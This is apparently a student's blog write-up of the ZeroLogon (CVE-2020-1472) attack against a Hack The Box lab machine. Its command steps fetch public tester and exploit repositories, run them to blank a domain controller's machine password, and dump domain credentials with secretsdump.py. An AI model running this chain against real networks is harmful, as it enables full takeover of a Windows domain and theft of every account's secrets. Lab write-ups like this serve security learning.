Finn Lestrange

Finn Lestrange

Computer Science Student.

CVE-2020-1472 - ZeroLogon

1 minute read

Overview

The attack described here takes advantage of flaws in a cryptographic authentication protocol that proves the authenticity and identity of a domain-joined computer to the DC. Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain. (Secura)

WhitePaper

Found Here

Installation

Firstly, you need the latest version of impacket from here

1

git clone https://github.com/SecureAuthCorp/impacket.git

Then cd into the folder and execute

1

pip3 install .

Testing if a DC is vulnerable

Spoiler, they probably are.

First, clone the following repo and install the requirements

1

git clone https://github.com/SecuraBV/CVE-2020-1472.git


1
2

cd CVE-2020-1472
pip3 install -r requirements.txt

Running the Check Script

Now that we have the testing script installed, we can check a host to see if they are vulnerable, I will be running this against the Multimaster machine from Hack The Box.

The command is as follows:

1

python zerologon_tester.py <DC netbios name> <DC-IP>

Bingo! We can see that the host is vulnerable!

Exploiting a Domain Controller

Risks

If you are doing this in a working production environment then you need to make sure you have the hash of the Domain Controller Machine Account as this wil be needed to reset the host after you have exploited it, otherwise it will no longer be able to communicate with other DC’s.

Getting the POC

To get the exploit, clone this git repo and make sure you have impacket installed

1

git clone https://github.com/dirkjanm/CVE-2020-1472.git

Now we can run the exploit against our vulnerable target machine

1

python cve-2020-1472-exploit.py <NETBIOS NAME> <DC-IP>

If all was sucessfull you will get a Result: 0

Dumping Domain Secrets with secretsdump.py

Now we have set the machine password to an empty string, “”, we can now DCSync with secretsdump.py to get all the domain secrets.

1

secretsdump.py -just-dc -no-pass DCHOSTNAME[email protected]DC-IP

And just like that I’ve owned your whole AD Environment, in less that two minutes.

Respect

If you enjoyed the write up or found it useful consider + repping my htb profile linked below:

HTB

Categories:

Updated: